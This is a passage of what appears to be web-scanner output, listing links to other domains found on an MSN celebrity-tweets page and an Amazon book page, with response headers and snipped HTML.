<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: #puppyNAVY ? RT <a href="http://twitter.com/RicardoFenty">@RicardoFenty</a>: #DogNavy <a href="http://twitpic.com/3kde2c">http://twitpic.com/3kde2c</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31484086254051328">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/StevenGParry">@StevenGParry</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31482886624378880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: <a href="http://twitter.com/PaulaAbdul">@PaulaAbdul</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/31481637023784960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31481112115019776">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/izzy_kardashian">@izzy_kardashian</a>: "I beat that beat up, call it self defense" you know you've made it when Lil Wayne quotes you in a song - <a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31480933047603200">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: LOVE emotional tweets, awe xoxo! "<a href="http://twitter.com/2RQ">@2RQ</a>: <a href="http://twitter.com/AubreyODay">@AubreyODay</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31478843529232385">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/llcoolj">llcoolj</a>: <a href="http://twitter.com/ashleeRocs">@ashleeRocs</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/llcoolj/statuses/31477242445959168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: Me shooting with the great <a href="http://twitter.com/avoyermagyan">@avoyermagyan</a> <a href="http://twitter.com/traverrains">@traverrains</a> <a href="http://twitter.com/kurumiuchino">@kurumiuchino</a>! <a href="http://twitpic.com/3umrxp">http://twitpic.com/3umrxp</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31475592251580417">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rainnwilson">rainnwilson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rainnwilson/statuses/31475437494345729">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15124_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/LoBosworth">LoBosworth</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/LoBosworth/statuses/31474891412738048">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/racheljosephf">@racheljosephf</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474364587180033">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: <a href="http://twitter.com/barbara230">@barbara230</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31474068645478400">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473906485297152">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7475_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/samantharonson">samantharonson</a>: RT <a href="http://twitter.com/AIDSPolicyProj">@AIDSPolicyProj</a>: <a href="http://twitter.com/samantharonson">@samantharonson</a> Egyptian activists are cobbling together their own internet: <a href="http://bit.ly/e3toNb">http://bit.ly/e3toNb</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/samantharonson/statuses/31473844573179904">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15856_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/mccordalex">mccordalex</a>: <a href="http://twitter.com/Punch800">@Punch800</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/mccordalex/statuses/31471195719208960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7477_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/iamdiddy">iamdiddy</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/iamdiddy/statuses/31469852891807744">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7895_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/SarahKSilverman">SarahKSilverman</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/SarahKSilverman/statuses/31469730384580608">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/18487_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/MirandaBuzz">MirandaBuzz</a>: A picture of towel art in the hotel. The elephant in the room. ;) <a href="http://yfrog.com/hsi3mlfj">http://yfrog.com/hsi3mlfj</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/MirandaBuzz/statuses/31469606199623680">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468574493114368">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/32972_Module1x1_634164434770437095.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/KimKardashian">KimKardashian</a>: Hate when that happens! Lol RT <a href="http://twitter.com/CarlaDiBello">@CarlaDiBello</a> RT <a href="http://twitter.com/PeterGriffinn">@PeterGriffinn</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/KimKardashian/statuses/31468288559030272">Twitter</a>
...[SNIP]...
<li><a href="http://www.delish.com/recipes/cooking-recipes/tailgating-football-recipes?ocid=xnetr1-3">Tailgating time: 10 winning recipes</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/watch/video/celebrity-gridiron-fans/ufd8pil8?q=Football+Fan&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-5">Bing video: Celebrity gridiron fans</a>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" >BLTWY</a>
...[SNIP]...
<li class="hasMenu" id="hasMenu2"><a href="http://msn.foxsports.com/" class="hasMenuLink">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" >MLB</a></li><li><a href="http://msn.foxsports.com/nascar " >NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" >NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" >NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" >NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" >NFL</a></li><li><a href="http://msn.foxsports.com/nhl" >NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" >Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" >Soccer</a></li><li class="last"><a href="http://msn.foxsports.com/video?from=en-us_msnhp" >Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" >Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" > Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " > Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" >Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" >Video</a>
...[SNIP]...
<li class="last"><a href="http://insidemsn.wordpress.com" >Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" >White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" >Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" >Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " >Travel</a>
...[SNIP]...
<li class="bingLink last"><a href="http://www.bing.com/search?FORM=CWWWBQ" >Bing</a>
...[SNIP]...
<li><a href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank" class="pass">MSN Privacy</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/Entertainment.aspx" onclick="window.open(this.href,'help','width=960,height=720,resizeable=yes,status=no,titlebar=no,toolbar=no'); return false;" class="ignore" target="blank">Help</a>
...[SNIP]...
</p><a href="http://microsoft.com" >Microsoft</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

22.370. http://www.amazon.com/gp/product/0470650923 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/0470650923

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/gp/product/0470650923?ie=UTF8&tag=varioussite07-20&linkCode=as2&camp=1789&creative=9325&creativeASIN=0470650923

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/41L0tdeaY2L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/41L0tdeaY2L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/512N51+QbGL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51ZBCnP8+0L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51ZBCnP8+0L._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51lFeW7HogL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51ucwGaw5gL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51vz6WNpVTL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif
http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://rd.a9.com/srv/redirect/?info=AJWKvKolhHM3CGJ903ZU7uhtabj-7WLC3n1Ns4Y0ZDCtzSIZQb292ueOKuraopIfWP0EjFCL44Wdj5fjl4aVjheGVhPyNSeM1qdwdoC-lzUlglSR1gVNp5NYqsE2PPvMqEkxs9PgjEyGQPI0bYMgRfnwPA0z7xvP.tpwHJi0nt7mzvy1zPCHs5Ixn6W36U9bX5wCEVmDb5apgbJTYgqHsUo6RM5E8z2CqkAZgOh0Q32jGlyaLGUTUANRs9S.bz.zyXHOAAps.DxTH7pYc.V32y7IM--9CsWVvJVY9tL2c.3a7OMdjw2UAnTzur9kTxhypNDooKW-4IgTWEPK2Q0To3AR2xyojgrD9oxRL-N.5HxcduaiQOu8K2rUAaVk.TkYbQV96HC4Xq3UZ8xyKBqLphfQ-ZuWwb9-KiU16dYPHf.wiIaZ7am9WvBemjX-ER.J5L0nCjVL0qhSRuaIrauas2ryAFCcPSssfQ__&awt=1&s=
http://rd.a9.com/srv/redirect/?info=ALZW6GY2r9vEb4CTvHw0RRGuDlaxa2nayoeavpXZujfJYaGkH19.QyQYSTKJIpPIuSLDdbVQwariibRKDEEBidwMMIvS7NV23vnW88w.q8dZA9ozyi0xOcaCV2rA6PqlCxdFs7RXXaVO1W7v4WzVNT8fBLUIyfLFyRwra7ZeOUUfaVGjZB2pLK89LytjDdnO-TS7jD-MNNWfrXp.4m7QWmACRFir-G4um3Eo-sGcWRFyQi-Qymdlr7vUyOaBt6J8bPvnhkdtkWSyN8TgeEpEp4X9f-VmnDJ3CIRl1rCRIAQHdhGkBfgv73UNyLnTnS0RxwlK2HysI-Fn3Hlg9th7KewdXWWuuWllCzrPorIfyAVV72pGJGL5st66H0q.5r3fEQV3JwNOC.quDvOb3JkWH-vuG1IbHw6fXU6izjyP8Bm1haiuW7pHhVwq3ZHSsoC70GW98jb3kJ7n29aK.bi42NCadLs02otET3UkhHbYlk2s&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AN4jYU4ypQbCyXqsUe-vOVtPwRfL1vTeNjpF8wF5clB3lveVwVclTIiZEXQuj8BZtv9w7TxL9CpyREoJ9QF7iaAVV8tQKyE4EKrS.wvWRiwr9TcR.qsg2p5lpi2mAGsSHtzXs3L124Wnr-pvOEyuCBv72xdJ-YoRWowVbRPcOIAQHDpvA.9H5w1dJO8FW2G8RhQp2dcvAyyyi6l2kFkqWapoBvSI0qHB6DDihxZX0Tn.t.GyNiB6Ion97oh1tl.34cDYn54bXxipUPSVoLCTUgLUmzZLHBK163CToTzIRCMLC.nGnYCG6vqnofhm15Ch2qpTeP9SNG5reRSNHFgeu9IhSM-x3Kep5wp7XO6wgzjwtlTV4g4jWOqN31sSAR-AqvYKMLqP0kaTWJ4vkTQdOLeevyWnegqnor1p6FsRiz0N469L89YmHU646oM1i1GW3tRCYaS0B20SqU72T-z4USTTZM8QE2rmMMZn-QMWJtwS&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:29:52 GMT
Server: Server
x-amz-id-1: 10BYGVG84SJDT6NK5QPW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: Q88q6IxskVrNIWayV7qw53kBxjzbTCVGq9rikqIi4h0WIkQdBAnBtxKB8IUJkYyC
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=192-2919974-2112928; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=yQ9pIXqVNQ+kictSRtVelTJ1cwo6IQrEPJd+SWonrlO++kyS3eLyIk/nXbtbxx8D0mbpsSGjtlUuYe0vRowEBFX4sJLod/zu37k/IErBpleFnaz490Xa9SJrjYxKo9y6hu8Qw1NAIvP4UUaxU2L8jbY4r+JHs4ZKm4hST9QEmWm4QdymYv1J0wtClao472qWA+wllUTs9XnshUSKK5Zm7V07ZqJFh4wIijJE8gGWy6ub2Eb0pbSAyRM/8LmJTh6hNxn3d/uTTI7mbtQzIJuC04Uu58ASnyvxk5fZ6wzy7FLYCySmGxvLO1zbG7cicDX3t7BaUJKRVQDLOs9+B6raaQASSQzPOHnazizlJ7UsFvCoBiazT7uOFWxYUsf/18czWXcuM7antU7XxMLLqoSkfFWlqwjyu3ae8xXJ53xwMF3gWWGRilFqmd2KJU/GPs60FA1sCx6Rd0c=; path=/; domain=.amazon.com; expires=Sat Feb 05 23:29:52 2011 GMT
Content-Length: 413393

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="bottomLeft">
<img src="http://g-ecx.images-amazon.com/images/G/01/kindle/cascade/read-first-chapter-free._V201174422_.png" id="kindleReaderSampleButton" style="cursor:pointer"/>
</td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=0470650923"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/0470650923/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/41L0tdeaY2L._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Professional Silverlight 4 (Wrox Programmer to Programmer)" onmouseover="" /></a>
...[SNIP]...
on.com/gp/student/signup/info&token=3A0F170E7CEFE27BDC730D3D7344512BC1296B83&pf_rd_m=ATVPDKIKX0DER&pf_rd_s=product-alert&pf_rd_r=10BYGVG84SJDT6NK5QPW&pf_rd_t=201&pf_rd_p=1284419222&pf_rd_i=0470650923"><img src="http://g-ecx.images-amazon.com/images/G/01/books/student/50_amazon_student._V187616879_.gif" width="50" align="left" alt="Textbook Student" height="37" border="0" /></a>
...[SNIP]...
<div style="float: left; width: 75px; padding-right: 8px;"><img src="http://g-ecx.images-amazon.com/images/G/01/Books/grutty/burst/buyback_75-b._SS75_V174666444_.gif" width="75" height="75" border="0" /></div>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALZW6GY2r9vEb4CTvHw0RRGuDlaxa2nayoeavpXZujfJYaGkH19.QyQYSTKJIpPIuSLDdbVQwariibRKDEEBidwMMIvS7NV23vnW88w.q8dZA9ozyi0xOcaCV2rA6PqlCxdFs7RXXaVO1W7v4WzVNT8fBLUIyfLFyRwra7ZeOUUfaVGjZB2pLK89LytjDdnO-TS7jD-MNNWfrXp.4m7QWmACRFir-G4um3Eo-sGcWRFyQi-Qymdlr7vUyOaBt6J8bPvnhkdtkWSyN8TgeEpEp4X9f-VmnDJ3CIRl1rCRIAQHdhGkBfgv73UNyLnTnS0RxwlK2HysI-Fn3Hlg9th7KewdXWWuuWllCzrPorIfyAVV72pGJGL5st66H0q.5r3fEQV3JwNOC.quDvOb3JkWH-vuG1IbHw6fXU6izjyP8Bm1haiuW7pHhVwq3ZHSsoC70GW98jb3kJ7n29aK.bi42NCadLs02otET3UkhHbYlk2s&awt=1&s=" rel="nofollow"><b>Silverlight</b></a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALZW6GY2r9vEb4CTvHw0RRGuDlaxa2nayoeavpXZujfJYaGkH19.QyQYSTKJIpPIuSLDdbVQwariibRKDEEBidwMMIvS7NV23vnW88w.q8dZA9ozyi0xOcaCV2rA6PqlCxdFs7RXXaVO1W7v4WzVNT8fBLUIyfLFyRwra7ZeOUUfaVGjZB2pLK89LytjDdnO-TS7jD-MNNWfrXp.4m7QWmACRFir-G4um3Eo-sGcWRFyQi-Qymdlr7vUyOaBt6J8bPvnhkdtkWSyN8TgeEpEp4X9f-VmnDJ3CIRl1rCRIAQHdhGkBfgv73UNyLnTnS0RxwlK2HysI-Fn3Hlg9th7KewdXWWuuWllCzrPorIfyAVV72pGJGL5st66H0q.5r3fEQV3JwNOC.quDvOb3JkWH-vuG1IbHw6fXU6izjyP8Bm1haiuW7pHhVwq3ZHSsoC70GW98jb3kJ7n29aK.bi42NCadLs02otET3UkhHbYlk2s&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=ALZW6GY2r9vEb4CTvHw0RRGuDlaxa2nayoeavpXZujfJYaGkH19.QyQYSTKJIpPIuSLDdbVQwariibRKDEEBidwMMIvS7NV23vnW88w.q8dZA9ozyi0xOcaCV2rA6PqlCxdFs7RXXaVO1W7v4WzVNT8fBLUIyfLFyRwra7ZeOUUfaVGjZB2pLK89LytjDdnO-TS7jD-MNNWfrXp.4m7QWmACRFir-G4um3Eo-sGcWRFyQi-Qymdlr7vUyOaBt6J8bPvnhkdtkWSyN8TgeEpEp4X9f-VmnDJ3CIRl1rCRIAQHdhGkBfgv73UNyLnTnS0RxwlK2HysI-Fn3Hlg9th7KewdXWWuuWllCzrPorIfyAVV72pGJGL5st66H0q.5r3fEQV3JwNOC.quDvOb3JkWH-vuG1IbHw6fXU6izjyP8Bm1haiuW7pHhVwq3ZHSsoC70GW98jb3kJ7n29aK.bi42NCadLs02otET3UkhHbYlk2s&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">intersystems.com/Cache</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AJWKvKolhHM3CGJ903ZU7uhtabj-7WLC3n1Ns4Y0ZDCtzSIZQb292ueOKuraopIfWP0EjFCL44Wdj5fjl4aVjheGVhPyNSeM1qdwdoC-lzUlglSR1gVNp5NYqsE2PPvMqEkxs9PgjEyGQPI0bYMgRfnwPA0z7xvP.tpwHJi0nt7mzvy1zPCHs5Ixn6W36U9bX5wCEVmDb5apgbJTYgqHsUo6RM5E8z2CqkAZgOh0Q32jGlyaLGUTUANRs9S.bz.zyXHOAAps.DxTH7pYc.V32y7IM--9CsWVvJVY9tL2c.3a7OMdjw2UAnTzur9kTxhypNDooKW-4IgTWEPK2Q0To3AR2xyojgrD9oxRL-N.5HxcduaiQOu8K2rUAaVk.TkYbQV96HC4Xq3UZ8xyKBqLphfQ-ZuWwb9-KiU16dYPHf.wiIaZ7am9WvBemjX-ER.J5L0nCjVL0qhSRuaIrauas2ryAFCcPSssfQ__&awt=1&s=" rel="nofollow">Web Development Careers</a>
